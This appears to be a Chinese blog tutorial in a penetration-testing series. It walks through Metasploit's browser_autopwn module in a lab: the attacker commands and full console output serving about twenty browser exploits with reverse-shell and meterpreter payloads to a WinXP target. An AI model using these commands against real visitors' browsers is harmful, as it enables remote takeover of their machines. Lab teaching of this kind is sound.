冰河技术
导读
♻学习路线
  • 面试必问系列

    • 面试必问
  • 架构与模式

    • Java极简设计模式
    • 实战高并发设计模式
  • Java核心技术

    • Java8新特性
    • IOC核心技术
    • JVM调优技术
  • 容器化核心技术

    • Dockek核心技术
  • 分布式存储

    • Mycat核心技术
  • 数据库核心技术

    • MySQL基础篇
  • 服务器核心技术

    • Nginx核心技术
  • 渗透核心技术

    • 渗透实战技术
  • 底层技术
  • 源码分析
  • 基础案例
  • 实战案例
  • 面试
  • 系统架构
  • Spring6核心技术
  • 分布式事务

    • 分布式事务系列视频
  • SpringBoot
  • SpringCloudAlibaba
  • 🔥AI大模型项目

    • 一站式AI智能平台
    • AI智能客服系统
    • AI智能问答系统
    • 实战AI大模型
  • 中间件项目

    • 手写高性能Redis组件
    • 手写高性能脱敏组件
    • 手写线程池项目
    • 手写高性能SQL引擎
    • 手写高性能Polaris网关
    • 手写高性能RPC项目
  • 高并发项目

    • 分布式IM即时通讯系统(新)
    • 分布式Seckill秒杀系统
    • 实战高并发设计模式
  • 微服务项目

    • 简易电商脚手架项目
  • 手撕源码

    • 手撕Spring6源码
🌍知识星球
  • 总览

    • 《书籍汇总》
  • 出版图书

    • 《深入理解高并发编程:核心原理与案例实战》
    • 《深入理解高并发编程:JDK核心技术》
    • 《深入高平行開發:深度原理&專案實戰》
    • 《深入理解分布式事务:原理与实战》
    • 《MySQL技术大全:开发、优化与运维实战》
    • 《海量数据处理与大数据技术实战》
  • 电子书籍

    • 《实战高并发设计模式》
    • 《深入理解高并发编程(第2版)》
    • 《深入理解高并发编程(第1版)》
    • 《从零开始手写RPC框架(基础篇)》
    • 《SpringCloud Alibaba实战》
    • 《冰河的渗透实战笔记》
    • 《MySQL核心知识手册》
    • 《Spring IOC核心技术》
  • 关于自己
  • 关于学习
  • 关于职场
B站
Github
导读
♻学习路线
  • 面试必问系列

    • 面试必问
  • 架构与模式

    • Java极简设计模式
    • 实战高并发设计模式
  • Java核心技术

    • Java8新特性
    • IOC核心技术
    • JVM调优技术
  • 容器化核心技术

    • Dockek核心技术
  • 分布式存储

    • Mycat核心技术
  • 数据库核心技术

    • MySQL基础篇
  • 服务器核心技术

    • Nginx核心技术
  • 渗透核心技术

    • 渗透实战技术
  • 底层技术
  • 源码分析
  • 基础案例
  • 实战案例
  • 面试
  • 系统架构
  • Spring6核心技术
  • 分布式事务

    • 分布式事务系列视频
  • SpringBoot
  • SpringCloudAlibaba
  • 🔥AI大模型项目

    • 一站式AI智能平台
    • AI智能客服系统
    • AI智能问答系统
    • 实战AI大模型
  • 中间件项目

    • 手写高性能Redis组件
    • 手写高性能脱敏组件
    • 手写线程池项目
    • 手写高性能SQL引擎
    • 手写高性能Polaris网关
    • 手写高性能RPC项目
  • 高并发项目

    • 分布式IM即时通讯系统(新)
    • 分布式Seckill秒杀系统
    • 实战高并发设计模式
  • 微服务项目

    • 简易电商脚手架项目
  • 手撕源码

    • 手撕Spring6源码
🌍知识星球
  • 总览

    • 《书籍汇总》
  • 出版图书

    • 《深入理解高并发编程:核心原理与案例实战》
    • 《深入理解高并发编程:JDK核心技术》
    • 《深入高平行開發:深度原理&專案實戰》
    • 《深入理解分布式事务:原理与实战》
    • 《MySQL技术大全:开发、优化与运维实战》
    • 《海量数据处理与大数据技术实战》
  • 电子书籍

    • 《实战高并发设计模式》
    • 《深入理解高并发编程(第2版)》
    • 《深入理解高并发编程(第1版)》
    • 《从零开始手写RPC框架(基础篇)》
    • 《SpringCloud Alibaba实战》
    • 《冰河的渗透实战笔记》
    • 《MySQL核心知识手册》
    • 《Spring IOC核心技术》
  • 关于自己
  • 关于学习
  • 关于职场
B站
Github
  • 第01部分:基础环境篇

    • 安装Kali系统
    • Kali配置
    • Kali中各项菜单的功能
    • 安装open-vm-tools实现虚拟机交互
    • Kali设置静态IP
    • kali安装免杀工具Veil-Evasion
    • 在Debian8上安装WPScan
    • metasploitable2修改密码
    • 操作系统支持的管道符
  • 第02部分:渗透工具篇

    • 使用Easy-Creds工具攻击无线网络
    • Nmap+Zenmap+Amap+Zmap
    • Zenmap
    • Amap
    • Zmap
    • Nessus的整理
    • Burpsuite上传截断及截断原理介绍
    • Kali2.0 Meterpreter 运用
    • lcx.exe内网转发命令教程-LCX免杀下载
    • 字典生成工具Crunch的使用案例
    • WinlogonHack获取系统密码
    • Msfvenom生成各类Payload命令
    • PsExec下载地址及其用法
    • Hydra安装Libssh模块
    • 利用procdump+Mimikatz 绕过杀软获取Windows明文密码
    • SQLMap的用法+谷歌黑客语法
    • SQLMap用法总结
    • SQLMap参数说明
    • 十大渗透测试演练系统
    • 目录扫描神器DirBuster用法
    • NMap在实战中的常见用法
    • Metasploit模块的格式说明
    • Meterpreter命令大全
    • Metasploit-Meterpreter-Shell信息收集相关的命令
    • 使用Metasploit编写绕过DEP渗透模块
    • Metasploit渗透php-utility-belt程序
    • 内网IPC$入侵
    • Metasploit渗透BSPlayer V2.68
    • Metasploit攻击VSFTPD2.3.4后门漏洞并渗透内网
    • Metasploit攻击PHP-CGI查询字符串参数漏洞并渗透内网
    • Metasploit攻击HFS2.3上的漏洞
    • Metasploit访问控制的持久化
    • Metasploit清除渗透痕迹
    • 利用Metasploit找出SCADA服务器
    • 利用Metasploit渗透DATAC-RealWin-SCADA Server2.0
    • MSF-Meterpreter清理日志
    • Metasploit自定义FTP扫描模块
    • Metasploit渗透MSSQL
    • Metasploit渗透VOIP
    • 破解工具hydra安装与使用
    • Metasploit自定义SSH认证暴力破解器
    • Metasploit自定义让磁盘失效的后渗透模块
    • PowerShell基本命令和绕过权限执行
    • Metasploit自定义收集登录凭证的后渗透模块
    • 利用Java生成穷举字典(数字+字母(大小写)+字符)
    • PowerShell工具之Powerup详解实录
    • Meterpreter以被控制的计算机为跳板渗透其他服务器
    • Win10完美去除桌面快捷图标小箭头
    • OpenVAS 8.0 Vulnerability Scanning
    • kali Metasploit 连接 Postgresql 默认密码
    • kali 使用OpenVAS进行漏洞扫描
    • kali 对威胁建模(附加搭建CVE:2014-6287漏洞环境)
    • kali Metasploit设置永久访问权限
    • Empire 反弹回 Metasploit
    • Metasploit制作并运行自定义Meterpreper脚本
    • 使用Metasploit实现对缓冲区栈的溢出攻击
    • 使用Metasploit实现基于SEH的缓冲区溢出攻击
    • Metasploit基本后渗透命令
    • Metasploit高级后渗透模块
    • Kali中一键更新Metasploit框架
    • Metasploit其他后渗透模块
    • Metasploit高级扩展功能
    • Metasploit之pushm和popm命令
    • Metasploit使用reload、edit、reload_all命令加快开发过程
    • Metasploit资源脚本的使用方法
    • 在Metasploit中使用AutoRunScript
    • 使用Metasploit获取目标的控制权限
    • 使用Metasploit中的NMap插件扫描并渗透内网主机
    • Kali一句话升级Metasploit的命令
    • Win2012R2打Windows8.1-KB2919355
    • Armitage基本原理
    • Armitage网络扫描以及主机管理
    • 使用Armitage进行渗透
    • 使用Armitage进行后渗透攻击
    • 使用Armitage进行客户端攻击
    • Armitage脚本编写
    • Armitage控制Metasploit
    • Armitage使用Cortana实现后渗透攻击
    • Armitage使用Cortana创建自定义菜单
    • Armitage界面的使用
    • tcpdump用法说明
  • 第03部分:木马篇

    • 各种一句话木马大全
    • asp图片木马的制作和使用
  • 第04部分:SQL注入篇

    • sqli-labs-master 下载与安装
    • SQL注入点检测方法
    • SQL语句生成一句话
    • ASP连接MSSQL数据库语句
    • SQL注入绕过技术总结
    • SQL Server启动/关闭xp_cmdshell
  • 第05部分:漏洞拿Shell篇

    • 各种解析漏洞拿shell
    • 网站入侵思路
    • IIS 6.0/7.0/7.5、Nginx、Apache 等 Web Service 解析漏洞
    • iis7.5加fck解析漏洞后台拿shell
    • 真正的IIS永远的后门解密
  • 第06部分:暴力破解篇

    • 使用rarcrack暴力破解RAR,ZIP,7Z压缩包
    • 使用reaver傻瓜式破解wifi之利用路由器WPS漏洞
    • Python爆破Wifi密码
    • MySQL暴力破解工具多线程版
  • 第07部分:渗透脚本篇

    • 3389脚本开启代码(vbs版)
    • 触发Easy File Sharing Web Server 7.2 HEAD缓冲区溢出的Python脚本
  • 第08部分:数据与系统提权篇

    • 数据库提权
    • NC反弹CMDSHELL提权总结
    • ASP Web提权
    • MSF提权
    • Metasploit Win10提权
  • 第09部分:客户端渗透篇

    • 浏览器渗透
    • 对网站的客户进行渗透
    • 与DNS欺骗的结合使用
    • 基于PDF文件格式的渗透攻击
    • 基于Word文件格式的渗透攻击
    • 使用Metasploit实现对Linux客户端的渗透
    • 使用Metasploit渗透Android系统
  • 第10部分:社会工程学

    • Metasploit之社会工程学工具包
  • 第11部分:log4j重大漏洞

    • 冰河连夜复现了Log4j最新史诗级重大漏洞,含完整案例代码,全网最全!!
  • 第12部分:问题记录篇

    • HTTP 错误 403.1 - 禁止访问:执行访问被拒绝
    • XP IIS 问题总结
    • IIS 403 404问题
    • DEDE5.7初始化数据体验包获取失败/无法下载安装
    • discuz报错Table 'uc.uc_pms' doesn't exist,uc_pms不存在
    • Windows远程登录提示超出允许最大连接数解决方案
    • Windows 2008自动关机最简单的解决方案
    • Hydra安装报错
    • 安装OpenVAS后找不到默认密码无法登录Web端
    • AppScan使用问题记录
    • Kali系统报错
    • Kali运行WPScan报错

浏览器渗透

攻击机: Kali 192.168.175.128

靶机: WinXP 192.168.175.130

Browser autopwn攻击

Metasploit中提供了一个browser autopwn模块,这是一个可以用来对各种浏览器进行测试和渗透的自动化向量。

autopwn指的是自动对目标进行渗透。autopwn模块在配置了所有要使用的浏览器渗透脚本后,将处于监听模式下。然后,它便等待着一个即将到来的连接。一旦连接建立,它就会发送一系列与目标浏览器相匹配的渗透模块,具体发送哪个模块要取决于受害者浏览器的类型。无论目标系统上运行着什么浏览器,只要存在漏洞,autopwn模块就能自动发起攻击。

Browser autopwn原理图:

img

使用Metasploit的Browser autopwn模块进行浏览器攻击

这里,我们先打开msf终端

msfconsole

然后在msf终端依次输入如下命令:

use auxiliary/server/browser_autopwn
show options
set LHOST 192.168.175.128
set URIPATH /
set SRVPORT 80
exploit

其中,我们需要制定LHOST、URIPATH、SRVPORT参数。SRVPORT参数制定了渗透服务器使用的端口。这个端口建议为80或者443。URIPATH是存储各种渗透模块的目录路径,它的值被指定为/,表示根目录。设定好这些参数之后,就可以输入命令exploit进行攻击了。

具体如下:

msf5 > use auxiliary/server/browser_autopwn
msf5 auxiliary(server/browser_autopwn) > show options

Module options (auxiliary/server/browser_autopwn):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   LHOST                     yes       The IP address to use for reverse-connect payloads
   SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT  8080             yes       The local port to listen on.
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)


Auxiliary action:

   Name       Description
   ----       -----------
   WebServer  Start a bunch of modules and direct clients to appropriate exploits


msf5 auxiliary(server/browser_autopwn) > set LHOST 192.168.175.128
LHOST => 192.168.175.128
msf5 auxiliary(server/browser_autopwn) > set URIPATH /
URIPATH => /
msf5 auxiliary(server/browser_autopwn) > set SRVPORT 80
SRVPORT => 80
msf5 auxiliary(server/browser_autopwn) > exploit
[*] Auxiliary module running as background job 0.

[*] Setup
msf5 auxiliary(server/browser_autopwn) > 
[*] Starting exploit modules on host 192.168.175.128...
[*] ---

[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/Kwhc
[*] Local IP: http://192.168.175.128:80/Kwhc
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/vzkqpBnTX
[*] Local IP: http://192.168.175.128:80/vzkqpBnTX
[*] Server started.
[*] Starting exploit multi/browser/firefox_tostring_console_injection with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/JLQaHqdG
[*] Local IP: http://192.168.175.128:80/JLQaHqdG
[*] Server started.
[*] Starting exploit multi/browser/firefox_webidl_injection with payload generic/shell_reverse_tcp
[*] Starting exploit multi/browser/java_atomicreferencearray with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/NObgkNaafM
[*] Local IP: http://192.168.175.128:80/NObgkNaafM
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_jmxbean with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/oAXSrii
[*] Local IP: http://192.168.175.128:80/oAXSrii
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_provider_skeleton with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/rgkOUbVZ
[*] Local IP: http://192.168.175.128:80/rgkOUbVZ
[*] Server started.
[*] Starting exploit multi/browser/java_jre17_reflection_types with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/zOAZWwwA
[*] Local IP: http://192.168.175.128:80/zOAZWwwA
[*] Server started.
[*] Starting exploit multi/browser/java_rhino with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/KMZSsvbLbdEAo
[*] Local IP: http://192.168.175.128:80/KMZSsvbLbdEAo
[*] Server started.
[*] Starting exploit multi/browser/java_verifier_field_access with payload java/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/zHZYuGKZAKbZ
[*] Local IP: http://192.168.175.128:80/zHZYuGKZAKbZ
[*] Server started.
[*] Starting exploit multi/browser/opera_configoverwrite with payload generic/shell_reverse_tcp
[*] Using URL: http://0.0.0.0:80/WZzpMp
[*] Local IP: http://192.168.175.128:80/WZzpMp
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/lZvfdntlB
[*] Local IP: http://192.168.175.128:80/lZvfdntlB
[*] Server started.
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/pgqDFJQG
[*] Local IP: http://192.168.175.128:80/pgqDFJQG
[*] Server started.
[*] Starting exploit windows/browser/ie_cgenericelement_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/MERLTwZVxeoDI
[*] Local IP: http://192.168.175.128:80/MERLTwZVxeoDI
[*] Server started.
[*] Starting exploit windows/browser/ie_createobject with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/TpOcHC
[*] Local IP: http://192.168.175.128:80/TpOcHC
[*] Server started.
[*] Starting exploit windows/browser/ie_execcommand_uaf with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/XaoAp
[*] Local IP: http://192.168.175.128:80/XaoAp
[*] Server started.
[*] Starting exploit windows/browser/mozilla_nstreerange with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/GAxmRqM
[*] Local IP: http://192.168.175.128:80/GAxmRqM
[*] Server started.
[*] Starting exploit windows/browser/ms13_080_cdisplaypointer with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/dWTagnZBC
[*] Local IP: http://192.168.175.128:80/dWTagnZBC
[*] Server started.
[*] Starting exploit windows/browser/ms13_090_cardspacesigninhelper with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://0.0.0.0:80/nfeHDD
[*] Local IP: http://192.168.175.128:80/nfeHDD
[*] Server started.
[*] Starting exploit windows/browser/msxml_get_definition_code_exec with payload windows/meterpreter/reverse_tcp
[*] Starting handler for windows/meterpreter/reverse_tcp on port 3333
[*] Starting handler for generic/shell_reverse_tcp on port 6666
[*] Started reverse TCP handler on 192.168.175.128:3333 
[*] Using URL: http://0.0.0.0:80/NiTvaxR
[*] Local IP: http://192.168.175.128:80/NiTvaxR
[*] Server started.
[*] Using URL: http://0.0.0.0:80/dIoa
[*] Local IP: http://192.168.175.128:80/dIoa
[*] Server started.
[*] Starting handler for java/meterpreter/reverse_tcp on port 7777
[*] Started reverse TCP handler on 192.168.175.128:6666 
[*] Started reverse TCP handler on 192.168.175.128:7777 

[*] --- Done, found 20 exploit modules

[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.175.128:80/
[*] Server started.

现在任何一个连接到攻击机80端口的目标都会遭到一个基于它所使用的浏览器的渗透攻击。当有受害者访问我们的IP地址时,browser autopwn模块就会向其发送各种漏洞模块,直到获得Meterpreter控制权限为止。

此时,我们在靶机WinXP上打开IE 6访问连接http://192.168.175.128,

这样,我们就可以拿到靶机的Shell了

写在最后

如果你觉得冰河写的还不错,请微信搜索并关注「 冰河技术 」微信公众号,跟冰河学习高并发、分布式、微服务、大数据、互联网和云原生技术,「 冰河技术 」微信公众号更新了大量技术专题,每一篇技术文章干货满满!不少读者已经通过阅读「 冰河技术 」微信公众号文章,吊打面试官,成功跳槽到大厂;也有不少读者实现了技术上的飞跃,成为公司的技术骨干!如果你也想像他们一样提升自己的能力,实现技术能力的飞跃,进大厂,升职加薪,那就关注「 冰河技术 」微信公众号吧,每天更新超硬核技术干货,让你对如何提升技术能力不再迷茫!

在 GitHub 上编辑此页
上次更新: 2026/4/29 16:18
Contributors: binghe001
Next
对网站的客户进行渗透
阅读全文
×

扫码或搜索:冰河技术
发送:290992
即可立即永久解锁本站全部文章

星球会员
跳转链接